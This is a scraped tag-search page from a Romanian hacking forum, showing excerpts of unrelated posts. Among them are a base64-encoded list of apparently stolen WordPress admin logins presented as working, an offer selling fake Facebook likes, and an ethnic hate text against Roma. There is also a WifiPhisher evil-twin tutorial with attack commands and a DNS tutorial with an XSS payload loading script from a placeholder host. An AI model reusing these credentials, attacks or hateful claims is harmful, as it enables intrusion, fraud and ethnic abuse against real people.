Jump to content

Search the Community

Showing results for tags 'pentru'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Salut ! Am ceva bani in mai multe conturi de adwords/twitter ads si nu vreau sa ii arunc pe teste gen clickbank sau alt tip de afiliat pentru ca mi se par invechite iar sa testez ceva nou nu-mi permite timpul,lucrez full time + o ora pana la munca dus si o ora intors ... Daca cineva doreste sa isi promoveze produsele sau serviciile si chiar are impact real sunt dispus sa cheltui acei bani,avand si eu parte bineinteles de acolo. Nu-mi trimiteti PM pentru jocuri,servere de metin si alte balarii de genul. Mersi,o zi buna !
  2. Oferta limitata: Vand like-uri Facebook pentru poze, postari, commenturi sau status-uri (nu pentru fan pages). Cantitate: minim 20.000 (de obicei intra mai multi) Sursa: undisclosed Pret: 65 eur (paypal invoice sau btc) Timp livrare: 7 zile lucratoare 10.000 = 35 eur (4 zile) 5.000 = 20 eur (3 zile) Pot fi recomandat de user RST caruia i-am vandut pana acum daca e nevoie (de fiecare data am livrat peste cantitatea comandata).
  3. Bacalaureat 2015 - Ghid pentru bacalaureat de nota 10(zece) la BIOLOGIE clasele XI-XII. Sinteze, teste si rezolvari O gasesc si eu undeva free? Multumesc.
  4. hitme

    [Liste] c++

    Se considera o lista dublu inlantuita de studenti cu structura:cod matricol, nume, prenume si media. Sa se scrie programul in C pentru crearea, ordonarea dupa medie si afisarea listei studentilor folosindu-se cate o functie adecvata pentru fiecare operatie (creare, ordonare si listare). cum pot ordona lista, fara sa permut valorile campurilor? eu am incercat asa, ceva ideei? EDIT: am inteles ca se poate ordona cu std::sort, dar nu stiu cum #include <iostream> #include <stdlib.h> using namespace std; struct nod { int cod_matricol; char nume[20]; char prenume[20]; float media; nod *urmator, *anterior; }; nod *prim, *ultim,xx; // int yy=0; void creez() { nod *c; c=new nod; cout<<"Cod matricol : "; cin>>c->cod_matricol; cout<<"Nume : "; cin>>c->nume; cout<<"Prenume : "; cin>>c->prenume; cout<<"Media : "; cin>>c->media; if (!prim) { prim=c; prim->urmator=0; prim->anterior=0; ultim=prim; } else { ultim->urmator=c; c->anterior=ultim; ultim=c; ultim->urmator=0; } } void afisez() { nod *c; int i=1; c=prim; while (c) { cout<<"Inregistrarea "<<i++<<" : "<<endl; cout<<"Cod matricol : "<<c->cod_matricol<<endl; cout<<"Nume : "<<c->nume<<endl; cout<<"Prenume : "<<c->prenume<<endl; cout<<"Media : "<<c->media<<endl; cout<<endl; c=c->urmator; } } void ordonez() { nod *x,*y,*aux; int auxaux; aux=prim->urmator; for(x=prim;x!=0;x=x->urmator) for(y=aux;y!=0;y=y->urmator) if(x->media > y->media) { xx=*x; *x=*y; *y=xx; *prim=xx; } } int main() { int n,i; cout<<"Cate inregistrari? : "; cin>>n; for(i=1;i<=n;i++) creez(); system("cls"); afisez(); system("pause"); system("cls"); ordonez(); afisez(); system("pause"); return 0; }
  5. DQpodHRwOi8vMTk1LjI0NS4yMDUuMTkvd3AtbG9naW4ucGhwDQphc3VlZGl0b3INCmFzdWVkaXRvcg0KDQpodHRwOi8vMTk2LjQxLjEzOS4xNzcvd3AtbG9naW4ucGhwDQpqYXkNCmpheTEyMw0KDQpodHRwOi8vMjAwLjIxMC4xMDEuMTE0L3dwLWxvZ2luLnBocA0KY2FibGV0ZWNoDQpzZW5oYTEyMw0KDQpodHRwOi8vMjAwLjQ3LjE3Mi44Mi93cC1sb2dpbi5waHANCmFkbWluDQoxMjM0NTYNCg0KaHR0cDovLzY0LjI1MS4yMi43NS93cC1sb2dpbi5waHANCmFkbWluaXN0cmFkb3INCjFxMnczZTRyDQoNCmh0dHA6Ly82NC4zNC4yMTYuMTE3L3dwLWxvZ2luLnBocA0KZGVtbw0KZGVtbw0KDQpodHRwOi8vNjQuMzcuNTcuMjE5L3dwLWxvZ2luLnBocA0KY29tdW5pY2FjaW9uZXMNCmNvbXVuaWNhY2lvbmVzMTIzDQoNCmh0dHA6Ly82NC43Ni4yMDcuMTgwL3dwLWxvZ2luLnBocA0KY21vcmFndWVzDQpjbW9yYWd1ZXMNCg0KaHR0cDovLzY1LjExNy4xNDYuMTk2L3dwLWxvZ2luLnBocA0KbWNjb2xscw0KbGV0bWVpbg0KDQpodHRwOi8vNjUuMjE1LjcxLjEzMS93cC1sb2dpbi5waHANCnRnc3VzZXINCnBhc3N3b3JkDQoNCmh0dHA6Ly82Ni4yMjMuNTUuOTkvYmxvZy93cC1sb2dpbi5waHANCmR0d29tYWNrDQptZXJjZWRlcw0KDQpodHRwOi8vNzQuMjA0LjE2OC4xODYvd3AtbG9naW4ucGhwDQphZG1pbg0KYWRtaW4xMjM0NQ0KDQpodHRwOi8vNzQuMjA2LjEwMy41Ny93cC1sb2dpbi5waHANCmFzaGVzdGFrb3YNCjEyMzQ1Ng0KDQpQYXlQYWwuLi4gVmFsaWRvciENCmh0dHA6Ly90b3ByZWNpcGVzLmNvLy93cC1jb250ZW50L3RoZW1lcy90d2VudHl0d2VsdmUvNDA0LnBocA0KDQpodHRwOi8vNzcuMjM2Ljk3LjEwNi93cC1sb2dpbi5waHANCmNhc2lubw0KY2FzaW5vDQoNCmh0dHA6Ly83OC4yNS4yMTQuNDEvd3AtbG9naW4ucGhwDQphZG1pbg0KYWRtaW4xMjMNCg0KaHR0cDovLzgxLjE2OS4xNzQuMTExL2Jsb2cvd3AtbG9naW4ucGhwDQphZG1pbg0KYWRtaW4xMjMNCg0KaHR0cDovLzgyLjExMy4xNzAuMTE2L3dwLWxvZ2luLnBocA0KYWRtaW4NCmFkbWluDQoNCmh0dHA6Ly84My4xNC4zMC4xOC93cC1sb2dpbi5waHANCnNpZXJvY2thDQpzaWVyb2NrYQ== Nu vand ... Le-am gasit , merg toate ! Daca stie cineva un checker pentru WP ?!
  6. Am urmatorul cod : <?php session_start(); require 'src/facebook.php'; require 'functions.php'; date_default_timezone_set("Europe/Bucharest"); $facebook = new Facebook(array( 'appId' => '111', 'secret' => '222', 'cookie' => true, )); $user = $facebook->getUser(); $mail_facebook = trim($femail); if ($user) { try { $user_profile = $facebook->api('/me'); $fbid = $user_profile['id']; $fbfullname = $user_profile['name']; $femail = $user_profile['email']; checkuser($fuid,$funame,$fbfullname,$femail,$fbid); } catch (FacebookApiException $e) { error_log($e); $user = null; } } if ($user) { $logoutUrl = $facebook->getLogoutUrl(array('next' => 'https://website.ro/logout.php', )); } else { $loginUrl = $facebook->getLoginUrl(array('scope'=> 'email', )); } ?> Iar pentru a apela link-ul pentru logarea pe site prin facebook folosesc <?php echo $loginUrl; ?> Insa nu pot sa-mi explic de ce nu se intampla absolut nimic cand dau click pe acel link de pe o pagina rescrisa cu RewriteRule care are si o variabila de tip GET in url. Exemple : RewriteRule test/$ /test.php RewriteRule ^teste-([^/]*)$ /teste.php?lot=$1 [L] test.php ->merge test/ -> merge teste.php?lot=exam ->merge teste-examen -> NU MERGE
  7. http://www.similarweb.com/landing/search-marketing-benchmark-2015-whitepaper?utm_source=marketo&utm_medium=email&utm_content=image&utm_campaign=em_SearchBenchmarkReport2015&mkt_tok=3RkMMJWWfF9wsRojv6rAZKXonjHpfsX87ewsXK6%2BlMI%2F0ER3fOvrPUfGjI4DScRlI%2BSLDwEYGJlv6SgFQrnEMbZlw7gEXBL0TD7slJfbfYRPf6Ba2JwwpvE%3D
  8. 1. Se taie orice fel de aloca?ie/subven?ie pentru copilul tigan care nu merge la ?coal?. Se taie ?i pentru fra?ii lui mai mici care nu au înc? vârsta de mers la ?coal?. Dac? unul din ei cre?te ?i merge la ?coal? acela prime?te aloca?ia ?i din urm?, minus cât a primit fratele mai mare aiurea. 2. Orice mam? tiganca este prins? la cer?it cu sugarul în bra?e (de multe ori adormit cu alcool) r?mâne f?r? el, bebelul intr? în sistemul de stat ca orfan ?i ea în pu?c?rie. F?r? discu?ii. 3. Orice copil tigan sub 16 ani este prins la cer?it de mai mult de dou? ori este preluat de sistemul de stat. F?r? discu?ii. 4. Orice tigan peste 16 ani este prins la cer?it mai mult de dou? ori intr? la mititica pentru o lun?. Dac? recidiveaz? termenul cre?te. 5. Orice tigan nu-?i pl?te?te impozitele pe proprietate sau nu are cum explica provenien?a propriet??ii este executat silit pentru impozite ?i i se confisc? venitul neexplicat. F?r? discu?ii. 6. Orice grup de tigani într? cu scandal într-o institu?ie a statului, c? e vorba de spital, tribunal sau sec?ie de mili?ie, intr? o lun? la r?coare. Dac? a f?cut mai mult decât scandal, termenul cre?te. 7. Orice ?atr?/colectivitate de tigani este prins? la furt organizat este b?gat? la mititica ?i copiii trimi?i în sistemul de stat. 8. Orice pirand? este prins? ridicându-?i fusta în public, cu inten?ii agresive, este sp?lat? cu gaz în zona scoas? la înaintare pentru diminuarea pericolului social. 9. Se revine la cuvântul oficial ?igan. Rom a ajuns s? aib? exact aceea?i conota?ie negativ? tr?gând-o în schimb ?i peste cuvântul român. 10. Toate m?surile de mai sus se aplic? pentru oricare alt cet??ean al României, indiferent de etnie. Norme metodologice: 1. Dup? cum vede?i cei zece pa?i se refer? doar la elementele negative ale societ??ii în nici într-un caz la milioanele ?i milioanele de ?igani respectabili de forma – am cunoscut romi mai de treab?, mai cinsti?i, mai sp?la?i decât românii. ?sta pe care l-a cunoscut toat? lumea e deja integrat ?i scutit de cei zece pa?i. 2. Închisorile ce vor acoperi cererea de cazare nu vor fi de tipul – avem nevoie de 500-600 de euro pe lun? pentru un de?inut – ci de genul – nu munce?ti m?nânci m?m?lig? cu ap? zilnic, 12-13 caza?i în camer?, igiena ?i deratizarea e treaba oaspe?ilor nu a altcuiva. 3. F?r? discu?ii. Articol de Ghita Traian - Reactii.ro Nationalisti.ro — National - Social - Radical @hate.me sari rpd cu ``infractiunea`` pe mine.
  9. Înva?? engleza gratuit. Pentru întotdeauna. Link : https://www.duolingo.com Ar trebui unu si pentru Romana
  10. Una dintre fricile utilizatorilor de laptop-uri cu webcam incorporat este aceea de a fi spionati fara stirea lor tocmai prin intermediul acelui web-cam, atunci cand folosesc computerele personale. Din pacate pentru acestia, frica lor nu este chiar fara temei, avand in vedere ca de-a lungul anilor au existat tot felul de malware-uri care au reusit sa faca fix acest lucru: sa spioneze utilizatorii Windows prin intermediul camerelor web conectate la sistem. Iar vestea si mai proasta este ca in prezent un astfel de malware a reusit sa infecteze peste jumatate de milion de computere in intreaga lume si continua sa-si faca de cap cu vulnerabilitatile utilizatorilor BlackShades Remote Access Tool (sau pe scurt Blackshades RAT) este un tip de malware care le permite hackerilor sa fure datele personale ale utilizatorilor cu computere infectate, sa intercepteze tastele folosite si sa foloseasca webcam-urile computereleor pentru a inregistra utilizatorii fara stirea acestora. In plus, BlackShades poate fi folosit pentru a cripta si a bloca fisierele de pe computerele infectate pentru ca apoi sa pretinda o anumita suma de bani pentru deblocarea acestora. Din 2012 si pana in prezent, cateva mii de persoane rau intentionate au cumparat acest malware, BlackShades RAT generand venituri de peste 3500$. Din fericire, unul dintre programatorii malware-ului, Michael Hogue, care a pledat vinovat in New York dupa arestarea sa din 2012, coopereaza cu FBI-ul pentru a opri raspandirea acestuia. Celalalt co-creator al Blackshades, Alex Yucel, a fost arestat in Moldova in Noimebrie 2013, si urmeaza sa fie extradat in SUA pentru proces. De asemenea, FBI a anuntat ca au mai fost arestati si alti 97 de utilizatori ai malware-ului, banuiti si ca ar distribui copii ale acestuia pentru preturi variind intre 40$ si 100$. Pretul scazut al malware-ului a facut ca acesta sa devina popular printre hackeri si, de la lansarea acestuia online, au aparut mai multe variante ale acestuia care circula pe internet sub alte nume. Informatiile stranse pana acum de FBI au condus luna aceasta la peste 359 de locuinte in peste 13 tari europene (Austria, Belgia, Marea Britanie, Croatia, Danemarca, Estonia, Finlanda, Franta, Germania, Italia, Moldova, Olanda si Elvetia), de unde politia a confiscat arme, droguri, bani si peste 1000 de dispozitive de stocare date. Intr-o investigatie anterioara relationata cu BlackShades, politia germana a arestat un tanar de 18 ani care a folosit acest malware pentru a inregistra si fotografia peste 2000 de femei aflate in fata camerelor web, fara stirea acestora.
  11. Introducere WifiPhiser, este un tool creeat in Python si este open source ( cu licenta MIT ), toolul il gasim pe : GitHub . Acest tool fiind creeat in 08 '14, astazi fiind un proiect destul de avansat, poate fii folosit de persoanele mai putin cunoscatoare . Este vorba de un program automatizat pentru efectuarea atacurilor de tip phishing contra retelelor wireless, in scopul obtionerii parolelor . Fiind catalogat ca instrument de inginerie sociala ( social engineering ), nu executa atacuri de tip bruteforce impotriva retelelor, acest tool pacaleste utilizatorul sa scrie parola retelei ( Access Point ) . In acest tutorial vom vedea in detaliu cum functioneaza . Cum functioneaza : WifiPhiser, foloseste o tehnica numita Evil Twin ( Geamanul Malefic ), adica el ia forma acces point-ului victimei . Dupa care el va porni un atac care va deconecta victima complet de la internet si va prelua controlul intregii conexiuni . Atacul are trei parti : Victima va fii deconectata de la reteaua wireless . Este vorba de un atac pe care noi mult probabil l-am mai folosit cu toolul aircrack-ng, prin care atacatorul trimite pachete de date care cauzeaza Denial of Service ( DoS ), fortand in asa fel ca, toate dispozitivele conectate la retea sa piarda acea conexiune . Acest tip de atac mai e cunoscut sub termenul de Jamming . Dispozitivul victimei se conecteaza la access point-ul atacatorului . O daca ce victima a fost constransa sa se deconecteze dupa ce noi am executat atacul precedent, un calculator sau un telefon, au abilitatea de a se reconecta la retea automat, dar de data aceasta, reteaua noua va fii aceea creeata de geamanul malefic . WifiPhiser, are un server DHCP, care furnizeaza adrese IP ( tinand locul unui router adevarat ) . Acum victima fiind conectata la "reteaua" noastra, o putem numii " man-in-the-middle", adica este sub controlul nostru ( al atacatorului ) . Victima va naviga pe o pagina web falsa . In aceasta ultima faza, orice site va accesa victima noastra, va fii furnizata in locul site-ului o pagina care va cere parola retelei wireless pentru a face un upgrade firmware-ului ( bine inteles aceasta este pagina atacatorului de phishing ) . O data ce victima scrie parola si apasa sumbit, aceasta va fii trimisa atacatorului . Folosire Pentru a puta folosi WifiPhisher, avem nevoie de 2 placi wireless, una cu capacitatea de a injecta . In acest exemplu vom folosii Alfa, iar placa interna al laptopului ( chipset Atheos ) . Teste urmatoare au fost facute pe Ubuntu, dar pot fii facute foarte usor si pe alte versiuni de Linux . Vom downloada WifiPhisher de pe GitHub, folosind urmatoarea comanda . git clone https://github.com/sophron/wifiphisher.git Vom rezolva mici deranjamente, instaland python-scapy si hostapd : sudo apt-get install python-scapy hostapd Inainte de a deschide toolul, sa ne uitam la parametri principali . Parametru || Descriere -m || Specifica numarul maxi de clienti pe care sa ii deconecteze in prima faza a atacului . -t || Specifica intervalul de timp pentru trimiterea pachetelor care ajuta la deconectare . Default, va utiza toata puterea placi de retea . Daca veti primii eroare de la python-scapy, puteti sa setati pachetele ( -t .00001 ) . -d || Sare peste prima faza al atacului, adica deconectarea dispozitivelor, astfel va creea doar un acces point geaman . -a || Va specifica adresa MAC, aici va trebuii sa luam manual MAC-ul tintei si sa-l specificam cu ajutorul acestui parametru . -jI || Selectioneaza manual interfata placii wireles, care se va ocupa cu Jamming . -aI || Selectioneaza manual interfata placii wireles care va devenii access-point-ul geaman . Pentru lista completa de parametri, folositi urmatoarea comanda : sudo python wifiphisher.py --help In sfarsit, purcedem, deschidem WifiPhisher : sudo python wifiphisher.py -jI wlan1 -aI wlan0 -a 88:53:2e:00:00:53 Aici " wlan1 ", este placa Alfa, " wlan0 ", este placa Atheos, si cu " -a " am specificat adresa MAC a tintei . Prima data ni se va arata toate retelele vizibile in jurul nostru . Pentru a selectiona o tinta (target), vom folosii CTRL+C si vom scrie numarul asociat acesteia ca in exemplu : Acum nu trebuie sa facem nimic, decat sa asteptam . Ni se va arata o noua fereastra, aceasta fiind divizata in 3 parti, urmand cu strictete fazele mai sus mentionate : Jamming, DHCP si request-uri HTTP : Acum dupa toate astea, victima, de fiecare data cand va vrea sa navigheze pe un site, ii va aparea acesta pagina ( pagina de phishing cu cererea parolei retelei ) : Sursa
  12. Salut as dori si eu o arhiva cu boti pentru mirc , ma poate ajuta cineva?
  13. Salut as dorii si eu o culegere in format pdf pentru bacalaureatul la matematica mate-info m1. Prefer sa imi recomandati una care stiti despre ea ca este buna , decat sa cautati pe google "culegere matematica bac m1.pdf". Multumesc! Edit: Daca nu aveti culegere cu exercitii , dati-mi pdf cu variante pentru bac care v-au ajutat si pe voi.Dar preferam exercitii ca puteam sa lucrez in fiecare zi.
  14. UTOK te provoac? s? fii urm?torul geniu al aplicatiilor Android! Dac? ai o aplica?ie pentru smartphone sau ai luat o pauz? din programat pentru a vizita aceast? pagin?, po?i câ?tiga 2.000€ dac? î?i înscrii aplica?ia sau conceptul de aplica?ie pe aceast? pagin?! Sun? simplu, nu? Iat? ce trebuie s? faci: • Creeaz? un cont pe site ?i autentific?-te. • Încarc? 6 fotografii ce arat? cât mai bine conceptul, fuc?ionalitatea, designul ?i numele aplica?iei tale. • Explic? în detaliu conceptul, func?ionalitatea, dac? aplica?ia va fi gratuit? sau nu ?i, dac? este cazul, cum vrei s? o monetizezi. Înscrie-?i aplica?ia pân? pe 19 aprilie ?i adun? voturi în perioada 20 aprilie - 26 aprilie pentru a primi 40% din nota final?. 60% din punctajul total va fi acordat de un Juriu specializat. Pe 27 aprilie afli dac? ai câ?tigat premiul de 2.000€. Link: BE TOMORROW'S APP GENIUS - Castiga 2000€! BE TOMORROW'S APP GENIUS - UTOK
  15. Luand in considerare evolutia conceptului de Internet of Things si dezvoltarea unui alt concept – Internet of Us, Kaspersky Lab colaboreaza cu comunitatea suedeza de bio-hacking, BioNyfiken, pentru a analiza procesul de utilizare a corpurilor umane pentru accesarea internetului. In trecut, acest proces a fost subiectul filmelor de Hollywood si al romanelor stiintifico-fantastice, insa, in 2015, numarul oamenilor hibrizi se afla intr-o continua crestere. Luand in considerare directia inventiilor tehnologice si adoptarea in masa a dispozitivelor precum stimulatoarele cardiace, pompele pentru insulina, aparatele auditive si sistemele de stimulare a proceselor cognitive, tot mai multi oameni pot fi considerati partial roboti. Informatii recente descriu un nou tip de oameni hibrizi – utilizatorii care isi implanteaza cipuri nu din motive medicale, ci pentru eficientizarea activitatilor zilnice precum controlul incuietorilor usilor, achizitiile online si accesarea computerelor printr-o miscare a mainii. Astfel, capacitatea de stocare a datelor personale prin intermediul implanturilor ridica noi probleme de securitate. BioNyfiken, o comunitate suedeza de bio-hacking, ia masuri pentru normalizarea acestui fenomen pentru a-l implementa la scara larga. Comunitatea BioNyfiken considera ca un implant nu este diferit de cercei sau de tatuaje si este de parere ca din ce in ce mai multi utilizatori vor opta pentru implanturi cu compatibilitate NFC (Near Field Communication) pentru a stoca serii de informatii. „Conceptul Internet of Things presupune dezvoltarea de produse pentru a le pune rapid pe piata,” spune Patrick Mylund Nielsen, Senior Security Researcher la Kaspersky Lab. „Utilizatorii fie se gandesc tarziu la securitatea dispozitivelor, fie nu se gandesc deloc. Desi bio-hacking-ul a fost un subiect al romanelor stiintifico-fantastic pentru o perioada indelungata, acestea nu au analizat si implicatiile: Ce se intampla atunci cand informatiile confidentiale sunt stocate pe un cip implantat? Poate cineva deveni o copie a noastra daca ne atinge? Am putea fi urmariti unde mergem? Cuvantul „nyfiken” inseamna curios si noi suntem curiosi sa aflam raspunsurile la aceste intrebari,” incheie Patrick Mylund Nielsen. „Tehnologia se intampla acum,” spune Hannes Sjoblad, unul dintre fondatorii BioNyfiken. „Observam cresterea comunitatii de utilizatori care experimenteaza prin implanturi care le permit sa indeplineasca anumite cerinte zilnice rapid si usor – accesul in cladiri, deblocarea dispozitivelor personale fara a introduce un cod PIN si accesul la numeroase date stocate. „Consider ca evolutia acestei tehnologii este un alt moment important in istoria interactiunii dintre oameni si computere, similar lansarii primelor computere cu Windows sau primelor ecrane cu tehnologie screen. Fiecare dispozitiv cu care ne identificam, fie ca este o cheie sau o cartela electronica, este inca un lucru care ne influenteaza vietile,” incheie Hannes Sjoblad. „Consideram ca este important sa lucram cu experti de top in securitate cibernetica pentru ca inteleg tehnologia si ne ajuta sa identificam riscurile. Kaspersky Lab este un partener de cercetare ideal pentru BioNyfiken. Expertii Kaspersky Lab nu doar ca au pregatire de top, ci au fost si initiatorii cercetarilor inovatoare cu privire la tehnologiile noi,” mai adauga Hannes Sjoblad. „Abia asteptam sa lucram cu expertii Kaspersky Lab intr-un proiect deschis de cercetare care sa exploreze vulnerabilitatile acestor cipuri in activitatile zilnice ale utilizatorilor, pentru a putea identifica modalitati de rezolvare in cazul in care acestea exista.” In plus fata de cercetarea in parteneriat cu BioNyfiken, Kaspersky Lab va organiza evenimente impreuna cu comunitatea de bio-hacking in Suedia si pe teritoriul Europei pentru a discuta aspectele referitoare la securitatea cibernetica si la spatiul privat. Exista numeroase cladiri hi-tech in Suedia, precum Epicenter care dezvolta business-uri care utilizeaza implanturi NFC in mod regulat pentru activitati variate, inlocuind alte dispozitive. „Eu prefer sa nu imi implantez un cip,” spune Eugene Kaspersky, Chairman si CEO la Kaspersky Lab. „Insa, inteleg evolutia tehnologiei si cred ca vor exista utilizatori care isi vor asuma riscuri, vor testa limitele tehnologiei si vor experimenta pe propriile corpuri. Mi-ar placea sa faca asta constienti de implicatii si sa tina cont de siguranta inainte, nu dupa ce s-a intamplat ceva, cum este cazul de cele mai multe ori,” comenteaza Eugene Kaspersky. „Imi pare foarte bine ca BioNyfiken a ales sa lucreze cu noi pentru a analiza implicatiile de securitate legate de utilizarea corpurilor umane pentru accesarea internetului. Poate ca expertii Kaspersky Lab nu vor descoperi nicio vulnerabilitate, insa, daca oamenii vor avea cipuri NFC in corpuri, as vrea sa ma asigur ca am analizat atent orice posbilititate,” mai adauga Eugene Kaspersky. -> Sursa: Telefoane conectate, case conectate, masini conectate… oameni conectati
  16. Ma gandesc ca ar fi bine ca fiecare membru al forumului sa aiba un titlu sugestiv in functie de ce posteaza. Titlu care sa NU poata fi modificat de catre el personal. Ceva de genul: 1. News poster (Cei ca @wirtz ) 8. Moderator/Super Moderator/ Admin / Owner / VIP 9. Newbie (Cel nou venit pe forum si/sau cel care nu are destule postari pentru a fi clasificat in vreo categorie.) 10. Hater (Cei carora le place sa dea dislike cat mai des si indiferent la ce anume, doar ca sa nu fie ei cei cu cele mai multe dislike-uri primite.)
  17. Caut pe cineva care se pricepe la PHP - HTML ! PM pentru a vorbi mai multe !
  18. Domeniu Nume Sistem ( DNS ), este unul din instrumentele pe care le folosim foarte des pentru a naviga pe internet, acesta fiind folosit pentru a transforma o adresa WEB sau un HOSTNAME cu formatul www.numesite.com.it.ro.net.ecc intr-o adresa IP cu formatul numeric nnn.nnn.nnn.nnn . Cum o sa vedem in continuare, DNS-urile au mult mai multe functii, iar scopul acestui tutorial este acela de a vedea, cum putem efectua ENUMERARI DI DESCOPERIRI, adica cum sa citim adresele IP asociate unui domeniu si sa descoperim sub-domeniile conectate acestuia . Tipuri de DNS Inainte de a incepe cu practica, este necesar sa clarificam, care sunt principalele tipuri de DNS si campul lor de utilitate Tip de DNS || Descriere A || Transofrma un HOSTNAME intr-o adresa IPv4 AAAA || Transforma un HOSTNAME intr-o adresa IPv6 CNAME || Transforma un HOSTNAME intr-un alt HOSTNAME MX || Ne da adresa de E-mail Exchange folosita pentru trimiterea de e-mail NS || Ne da adresa NAMESERVER folosita pentru gestionarea "recordDNS" TXT || Ne ofera un sir ( string ) SRV || Service Record, folosit pentru a specifica un tip de serviciu, poate contine HOSTNAME-ul si PORT-ul pe care serviuciu lucreaza, foarte des folosit pentru VoIP PTR || Pointer Record, folosit pentru a obtine un HOSTNAME pe IP Pe pagina de Wikipedia, este disponibila lista completa tuturor tipurilor de DNS record . Enumerare si descoperire Tool-ul care ne permite sa facem chemari de tip DNS ( request ) este dig . Sa vedem cum putem sa chemam tipul de DNS " A " al domeniului HTML.it, folosind serverul DNS google ( 8.8.8.8 ) : dig @8.8.8.8 -t A html.it Dar daca vom vrea sa obtinem toate topurile de DNS record, fara sa specificam ce vrem pas cu pas, vom folosii : dig @8.8.8.8 -t ANY html.it Informatiile primite de la dig, pot fii prea putine si incomplete, putem insa sa obtinem mai multe informatii folosind dnsdict6 . dnsdict6 -4 -d -S html.it Comenzile precendente : Paramentrul " -4 ", efectueaza enumerarea si pe protocolul IPv4 Paramentrul " -d ", ne arata informatii si indrumari IPv6 Paramentrul " -S ", cere efectuarea enumerari pe tipul de DNS SRV dnsdict6 contine default un dictionar de aproximativ 1500 de cuvinte cheie, care sunt utilizate ( cum se vede in iesire precendenta ( output )), pentru a gasii domenii de nivelul 3 ( numite sub-domenii ) . Este posibil daca vrem sa specificam un dictionar extern . dnsdict6 -4 -d -S html.it /home/simone/dizionari/dns_presonal.txt Acum ca am obtinut o lista mai mult sau mai putin completa de sub-domenii putem sa trecem la folosire de " dnsenum ", o comanda care in afara ca probeaza din dictionar cuvintele cheie, efectueaza o cautare direct pe Google, pentru a ne da rezultate mult mai exacte . dnsenum --dnsserver 8.8.8.8 --enum html.it Comenzile precendente : Parametrul " -dnsserver ", specifica pe care server sa mergem si sa efectual request-urile Parametrul " -enum ", porneste varie tipuri de enumerare, dintre care, dictionar, cautare Google si rezultate Whols . Pe langa toate astea, este posibil sa obtinem o lista cu sub-domenii cu ajutorul Google ( excluzand rezultatele care contin WWW, utilizand stringul ca in exemplu : site:html.it -www Incest puct in care suntem ajunsi avem mult mai multe informatii despre domeniul pe care il analizam . Putem strange acum cuvintele cheie pe care le-am folosit, pentru a proteja domeniul de atacurile de tip " Man-in-the-Middle" sau transferuri frauduloase . Acest sistem de protejare se numeste DNSSEC . dnsrecon -d verisigninc.com Paramentrul " -d ", ne permite sa specificam domeniul asupra caruia vrem sa efectual enumerarea . Acum, avem destule informatii pentru a face descoperirea ( discovery ) : este vorba de procesul de cautare prin adresele IP ( vecine ), cautand alte nume DNS, care pot face referire la tinta noastra ( target ) . dnsrecon -r 151.1.244.200/24 Parametrul " -r ", efectueaza un " Reverse Lookup " . Range-ul ( Gama ), este specificata cu un netmask, este request-ul care este trimis serverului DNS de tip PTR . Pentru a face reversing adreselor IPv6, putem folosii dnsrevenum6 : dnsrevenum6 8.8.8.8 2001:41d0:1:ad64:1::/48 In precedenta comanda, primul parametru este adressa serverului DNS ( in acest caz Google ) si al doilea parametru este range-ul, specificat cu netmask /48, al adresei IPv6 . Toate informatiile adunate, provin din servicii publice, deci sunt consultabile de oricine, nu am facut nici o ilegalitate pe durata procesului de enumerare si descoperire . DNS : Functionarea si verificarea acestuia de vulnerabilitati Parcursul unui request DNS . Imaginea de mai sus, a fost selectata din prezentarea tinuta de Ron Bowes ( angajat Google ), tinuta la DerbyCon 2014, unde explica exact cum functioneaza un request DNS . Primul dispozitiv pe care il vom interoga va fii router-ul nostru . In cazul in care nu s-au facut request-uri pana acum, request-ul va ajunge la serverul DNS configurat in internul router-ului . Daca nici Google nu este abil pentru a rezolva adresa, va face intrebari root-serverelor (servere care sunt responsabile pentru fiecare domeniu de nivel 1 in parte ) . Daca nici aceste ultime masuri nu gasesc raspunsul, vor face un tur de request-uri la autohoritative server, care este un server DNS sub controlul nostru . In acest mod vom putea raspunde originalului request DNS cu valoarea aleasa de noi . Trebuie sa stim sa serviciul DNS este lasat deschis in majoritatea parilor de server, daca nu ar fi asa, nu ar mai exista posibilitatea ca serverul sa comunice cu toti la nivel global . Acesta ne permite sa comunicam cu serverul, reusind sa trecem peste eventuali Firewall sau Intrusion Prevention System ( IPS ) . Noi metode de atac folosind DNS-uri, verificarea de vulnerabilitati Intr-un assessment in blackbox este greu sa intelegem cum datele vin in internul sistemului . Cu ajutorul DNS-ului putem sa urmarim sau cel putin sa intelegem daca datele noastre sunt acceptate de terzi . Cross-Site Scripting ( XSS ) In perioada 2010 si 2012 au fost efectuate teste pe trei mari portale de Whols surprinzand, ele fiind vulnerabile atacurilor XSS, atacatorul crease un record DNS de tip TXT cu un cod similiar acestuia . <script src="http://siteulnostru/evil.js"></script> Folosind alte tipuri de DNS, cum ar fi, CNAME, MX sau PTR, ar fi fost mult mai greu, vazand ca tipurile de record precedente nu permit folosirea de spatii sau ghilimele ca in exemplu . <script/src='http://siteulnostru/evil.js"></script> Atacatorul a reusit sa injecteze un cod malitios permanent, care putea afecta orice vizitator . SQL injection Exista multe functii PHP sau ASP, care permit sa preluam valoarea unui record DNS . Aceste date pot fii folosite in continuare si utilizate intr-un query SQL fara a fi filtrat . Sa vedem cum putem exploata acest tip de vulnerabilitate, folosindune de un exemplu dat de Ron Bowse facut in PHP . Atacatorul are posibilitatea de a modifica query-ul SQL, obtinand parola unui alt user, utilizand un record DNS de tip TXT ca in exemplu . Acesta fiind un singur exemplu unde utilizatorul stie codul sursa al aplicatiei . Intr-un caz real este greu sa afli adevaratul query 